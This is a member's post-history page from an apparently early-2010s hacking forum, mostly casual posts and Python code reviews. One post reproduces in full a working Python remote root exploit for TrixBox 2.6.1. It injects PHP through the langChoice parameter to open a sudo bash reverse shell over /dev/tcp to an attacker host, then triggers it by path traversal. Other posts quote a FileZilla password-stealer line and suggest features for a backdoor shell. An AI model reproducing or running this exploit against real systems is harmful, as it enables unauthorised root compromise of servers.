Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - 10n1z3d

Pages: [1] 2 3
1
Anonymity / Re: How do you stay anonymous?
« on: March 28, 2012, 10:16:32 am »
Ugh, how does SSL make one anonymous?

2
Hacking and Security / Re: BT5, Blackbuntu, Pirate linux
« on: March 08, 2012, 08:35:02 pm »
None of them. I don't like these all in one distros. Thats why I'm currently running Arch Linux.

3
General discussion / Re: The Music Thread
« on: March 08, 2012, 08:28:07 pm »
Bob Marley - sun is shining (smoke out dubstep remix)

https://www.youtube.com/watch?v=fccb4tGCQWk

4
VB - VB.NET - C# - C++.NET / Re: [SourceCode]FileZilla Accounts Stealer
« on: February 19, 2012, 09:42:58 am »
Code: [Select]
string sFilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\FileZilla\\recentservers.xml";
DAFUQ?

Can't believe they are actually storing the passwords in plain text.

5
Projects and Discussion / Re: EvilReverseBackdoorShell
« on: February 19, 2012, 09:34:10 am »
And i am asking you people, got any idea's on features that will just be mind blowing?,  feel free to apply if you like to write python/php modules.

Encrypted client-server communication.

6
Scripting languages / Re: [Perl] Port Scanner
« on: February 19, 2012, 09:26:44 am »
How is Perl? The syntax looks so much nicer than Python, I am trapped in C++ style syntax.

/facepalm

I was going to argue here, but I will just say that Perl got a reputation of a write-only language, guess why.

7
Hacking and Security / Re: GPU Accelerated Hash Cracker (ighashgpu)
« on: August 14, 2011, 10:21:17 pm »
hashkill is not bad either.

http://sourceforge.net/projects/hashkill/

8
The indentation on that line looks fucked up. Try this one:

Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")

if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
    buffer=("POST /user/index.php HTTP/1.1 \r\n"
    "Host: 192.168.219.132 \r\n"
    "Content-Type: application/x-www-form-urlencoded \r\n"
    "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
    return buffer

def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output

def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
        if re.search("Set-Cookie",header):
            cook=header.split(" ")
            sessionid=cook[1][10:42]
            print "[*] Session ID is %s" % sessionid
            return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
#send_post(host,port,cleanup) # sending same shit twice? doesnt look right. GTFO!
print "[*] Done!"

I have also commented out line 64 which seems useless to me.

9
Android / Re: Looking for free C Compiler app
« on: July 04, 2011, 09:37:33 am »
Dev C++

Good luck with that LOL.

10
Creative Arts / NYAN CAT ASCII
« on: July 02, 2011, 05:20:06 pm »
Code: [Select]
+      o     +              o   
    +             o     +       +
o          +
    o  +           +        +
+        o     o       +        o
-_-_-_-_-_-_-_,------,      o
_-_-_-_-_-_-_-|   /\_/\ 
-_-_-_-_-_-_-~|__( ^ .^)  +     + 
_-_-_-_-_-_-_-""  ""     
+      o         o   +       o
    +         +
o        o         o      o     +
    o           +
+      +     o        o      +   


Do you approve?


11
Found it on the Webs / Re: [music]FILTH FM
« on: June 27, 2011, 06:58:54 pm »
Thanks, been looking for some good Drum & Bass radio.

13
Scripting languages / Re: [Python] CountMyFiles
« on: June 13, 2011, 05:36:03 pm »
You should try to keep your code width less than 80 characters. It looks better and it's a good practice. Most code editors can show a line on the right which will guide you. If you are using gedit, go to Edit->Preferences and check Display right margin, then for Right margin at column select 80.

14
Scripting languages / Re: [Python] Random name generator
« on: June 13, 2011, 05:16:05 pm »
The following lines are pretty messy:

Code: [Select]
TempInt = 0
GeneratedNameArray = []  # initiate another array
GeneratedName = ''
while TempInt != number:
    RandNumb1 = random.randint(1,len(ListOfNames)-1)
    RandNumb2 = random.randint(1,len(ListOfNames)-1)
    GeneratedNameArray.append(ListOfNames[RandNumb1]+' '+ListOfNames[RandNumb2])
    TempInt = TempInt + 1

First, you have declared the GeneratedName variable, but you are not using it anywere in the code. Second, your while loop doesn't look right, something iike this would be better:

Code: [Select]
while len(GeneratedNameArray) <= number:
    #do_something()

Third, you are not checking for duplicate names. Also, using the choice() method from the random module would be much better instead of generating pseudo-random integers.

Therefore, the above code could just become:
Code: [Select]
GeneratedNameArray = []
while len(GeneratedNameArray) <= number:
    name = '{0} {1}'.format(random.choice(ListOfNames), random.choice(ListOfNames))
    if not name in GeneratedNameArray:
        GeneratedNameArray.append(name)

There are more optimization which could be done like appending the names to the output file straight from the while loop and like I said in one of the other topics, the GetFromArg function is pretty useless. Again, you should definitely read about the naming conventions in Python and it's syntax (PEP8).

15
Scripting languages / Re: Twitter Console Version 0.1 [Python]
« on: June 13, 2011, 04:37:55 pm »
Just wondering does the twitter api come included with python or do you need to download it
Of course its a third-party module. If you are running Ubuntu just install the python-twitter package:

Code: [Select]
sudo apt-get install python-twitter
otherwise take a look here: http://code.google.com/p/python-twitter/.

Pages: [1] 2 3


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.